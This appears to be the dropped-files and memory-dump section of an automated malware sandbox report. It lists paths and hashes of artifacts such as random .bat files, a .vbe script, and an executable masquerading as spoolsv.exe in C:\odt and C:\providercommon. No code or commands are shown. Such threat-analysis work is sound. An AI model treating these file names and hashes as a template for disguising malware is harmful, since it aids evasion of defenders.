C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6fb7216aa6a8b735125d0f680cd41e6a

SHA1
32bf2ff6a7206de96d6b61efaee1af724831b7f8

SHA256
d01a5e15d77dae6a6730a31c41d1c15c8df88223a670610e3f9c9906f476fedc

SHA512
04b2e0b50e0b325ea8ef708165559846ef7c150cdacf90021de8daf543c8136a0cf10565f608e20f3f75c53b12b01d5bc53bc315e2866821729dee36ae587f62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5196005384db4b734a03b450f6047291

SHA1
106345b898e57495b316a20abcde884bee37b106

SHA256
6f5418303893fff76195415f7011933c2aa83c421736d05e6698ff54652b72d4

SHA512
15158c38e7b1e8da10ebad4022e0e5b9daa39e516cefb988bdf9ba890af7bdd7dafae109ed8eabeffea55b35131f681d1fe36742ca5420ea497a042804aee082

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d9c2a8a533c7ada7b393127beb23c5f6

SHA1
1dc07acfa12b225730e911a62c38d7fd87d739a3

SHA256
ed4da0b73d94b3cb795431692e39e70fdb9f602ffb1a2076fc32d8e7b60b8bf0

SHA512
002c94440c3ec6a846c362c9742000d6c1bbf5ae4a19c0136c96ce6015d3892ff4a6ced29e86f3771780e753b92adcfe6e91ea172139996955ef2221c719ff89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d9c2a8a533c7ada7b393127beb23c5f6

SHA1
1dc07acfa12b225730e911a62c38d7fd87d739a3

SHA256
ed4da0b73d94b3cb795431692e39e70fdb9f602ffb1a2076fc32d8e7b60b8bf0

SHA512
002c94440c3ec6a846c362c9742000d6c1bbf5ae4a19c0136c96ce6015d3892ff4a6ced29e86f3771780e753b92adcfe6e91ea172139996955ef2221c719ff89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
976f9460c70c6152d51268c92047a9e4

SHA1
d6364332ef19040f010312179575875326c215c6

SHA256
55bafe6cd2eaad40f35b53760b279da4c82ea3f01516db37345cd86cc098fd5a

SHA512
b65de14b9dfb38fbd927b4ebeaa35155abdb956f90dc407e312abf396255a682af089ce84c6f40b95cdd37cb4243caadf5ead774d81258cf21f4b611ebda584c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c1ffdc1053335f0fee385152344cfd06

SHA1
4ac4c27f603f38baecb8723d4c66a1d577038a1e

SHA256
24c5d6c70e9afb5eef8d8271d8d7d444f3f64672321c74f82c93e7c72c3783bc

SHA512
e39d4f8500b3de9dcaa35bdd340a669a0f4d115b0ab15153b1a6a59e48a2a7944d6216a0cc2785c1149446fe5bd260947ac87a477ca20af3be723aaf230c5cd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c1ffdc1053335f0fee385152344cfd06

SHA1
4ac4c27f603f38baecb8723d4c66a1d577038a1e

SHA256
24c5d6c70e9afb5eef8d8271d8d7d444f3f64672321c74f82c93e7c72c3783bc

SHA512
e39d4f8500b3de9dcaa35bdd340a669a0f4d115b0ab15153b1a6a59e48a2a7944d6216a0cc2785c1149446fe5bd260947ac87a477ca20af3be723aaf230c5cd2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
804631e36c0f348f91e99fcdfb058181

SHA1
922134095779424a46aa2b876aaee00fda2cec1c

SHA256
42712bcbe8ea2fabcfc605284120340d4d98a1e91d65b7225ee1cd271ab3eb2d

SHA512
b2e38d65f3ba1d064673a1e90a4ff92834029ea09728a3b14e59105edffc03043c0835c76af08f03ab37d2df9fd124cc1815a56f059ad68bc40301023d61c625

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
804631e36c0f348f91e99fcdfb058181

SHA1
922134095779424a46aa2b876aaee00fda2cec1c

SHA256
42712bcbe8ea2fabcfc605284120340d4d98a1e91d65b7225ee1cd271ab3eb2d

SHA512
b2e38d65f3ba1d064673a1e90a4ff92834029ea09728a3b14e59105edffc03043c0835c76af08f03ab37d2df9fd124cc1815a56f059ad68bc40301023d61c625

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9dc92dcb9daf1a7ad5ed6a4d552a1ac5

SHA1
2b9e6c2ac924a1dd76fae1e0d95dfbf71d0f24d5

SHA256
050d8f2d0a1d164c9a1a100923c5e14c33ce211da52b33dc18b344a4fa4f71bf

SHA512
11c70275e0801cc9ef3df8ed66e26c827a2670597b57c9ceda669272217812fe402da9d9602da2d64a3563c2f1c73629b7d6f21d561db0be0ac5886bad1eeba1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4720c3a48e3cb42e41364ab2f3c213ff

SHA1
ba26b6874bae76b9f9258af802977c5fd62d0ab5

SHA256
490c3b49d31c19fc8b1247e787252a9282c3dce3813488f6fa0d51ce8f88d9c3

SHA512
ee07cbfb1858e48c062511683d39f1fe965bfc66f349a6b2ad69bc09a274efe943ae940d17b6f26bb3186d66648d3b79cc3dd173329fcd1047c19634a9abb506

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4720c3a48e3cb42e41364ab2f3c213ff

SHA1
ba26b6874bae76b9f9258af802977c5fd62d0ab5

SHA256
490c3b49d31c19fc8b1247e787252a9282c3dce3813488f6fa0d51ce8f88d9c3

SHA512
ee07cbfb1858e48c062511683d39f1fe965bfc66f349a6b2ad69bc09a274efe943ae940d17b6f26bb3186d66648d3b79cc3dd173329fcd1047c19634a9abb506

Download Submit
C:\Users\Admin\AppData\Local\Temp\TA6UjH3MJQ.bat

Filesize
183B

MD5
b48db64a20c6a24cc35e8d82a31fb730

SHA1
2c301dddf68dcebd3997caf7f0b3f831ea34b89f

SHA256
2513bf72474e2a0f99f88c1bc1533fe6634a95687bfdc83a74743693b2b237f8

SHA512
999ab8542b679c087c396a8f3b74e494d721ff7192ebacb5768face7ce884b3cb878f25646ff36515bb76ff5b7adfc93935995d4ee39aa2638f4df4807977214

Download Submit
C:\Users\Admin\AppData\Local\Temp\V68XQM6FdC.bat

Filesize
183B

MD5
a70f48451eef987027878e674414bacd

SHA1
488f50ac70bdcb992571124f43d11e7375230549

SHA256
bcf2d31aa11a420bad07ff09d6d49f746925893abc3d8cd7a03cdd9ce6e7677c

SHA512
c150fb630d1c45487bc340690ef01cef59b79233dee96f40d01a1933feab2b7e10f804de923488b9c185942e5da2116ce4b348417a28bb638243a08ab1643ff1

Download Submit
C:\Users\Admin\AppData\Local\Temp\wUBsuxMZs4.bat

Filesize
183B

MD5
0b2a73ab75d518019ecef02d1e0fdbc2

SHA1
832290664ab43fa06c7693b3a7393942ffc8bc96

SHA256
667fa980871804997756d0a4840de0fcd90ca1aef8bafd0a49c58e2234f89194

SHA512
3a5c691ebacd9353d0d50f369bc1da94070053b42767249c8a001ce04006ee2e0537cc9528bb43dded8f0ec28b96c05f8bb393d97812c467dc64ad0b9e085ce8

Download Submit
C:\odt\spoolsv.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\odt\spoolsv.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\odt\spoolsv.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\odt\spoolsv.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\odt\spoolsv.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\1zu9dW.bat

Filesize
36B

MD5
6783c3ee07c7d151ceac57f1f9c8bed7

SHA1
17468f98f95bf504cc1f83c49e49a78526b3ea03

SHA256
8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322

SHA512
c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

Download Submit
C:\providercommon\DllCommonsvc.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\DllCommonsvc.exe

Filesize
1.0MB

MD5
bd31e94b4143c4ce49c17d3af46bcad0

SHA1
f8c51ff3ff909531d9469d4ba1bbabae101853ff

SHA256
b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63

SHA512
f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

Download Submit
C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

Filesize
197B

MD5
8088241160261560a02c84025d107592

SHA1
083121f7027557570994c9fc211df61730455bb5

SHA256
2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1

SHA512
20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

Download Submit
memory/904-354-0x0000022801E40000-0x0000022801E62000-memory.dmp

Filesize
136KB

Download
memory/904-357-0x000002281A120000-0x000002281A196000-memory.dmp

Filesize
472KB

Download
memory/2640-147-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-148-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-156-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-157-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-158-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-159-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-160-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-161-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-162-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-163-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-164-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-165-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-166-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-169-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-168-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-167-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-170-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-171-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-172-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-173-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-174-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-175-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-176-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-177-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-178-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-116-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-117-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-118-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-154-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-153-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-120-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-121-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-152-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-151-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-123-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-124-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-125-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-126-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-127-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-150-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-128-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-149-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-129-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-115-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-155-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-146-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-145-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-144-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-143-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-130-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-142-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-131-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-132-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-141-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-140-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-139-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-138-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-134-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-135-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-133-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-137-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/2640-136-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/4212-283-0x0000000002490000-0x000000000249C000-memory.dmp

Filesize
48KB

Download
memory/4212-284-0x00000000024A0000-0x00000000024AC000-memory.dmp

Filesize
48KB

Download
memory/4212-285-0x00000000024C0000-0x00000000024CC000-memory.dmp

Filesize
48KB

Download
memory/4212-282-0x0000000000C90000-0x0000000000CA2000-memory.dmp

Filesize
72KB

Download
memory/4212-281-0x0000000000330000-0x0000000000440000-memory.dmp

Filesize
1.1MB

Download
memory/4748-181-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/4748-180-0x0000000077A00000-0x0000000077B8E000-memory.dmp

Filesize
1.6MB

Download
memory/4792-366-0x0000000000B30000-0x0000000000B42000-memory.dmp

Filesize
72KB

Download
memory/4968-753-0x0000000000CB0000-0x0000000000CC2000-memory.dmp

Filesize
72KB

Download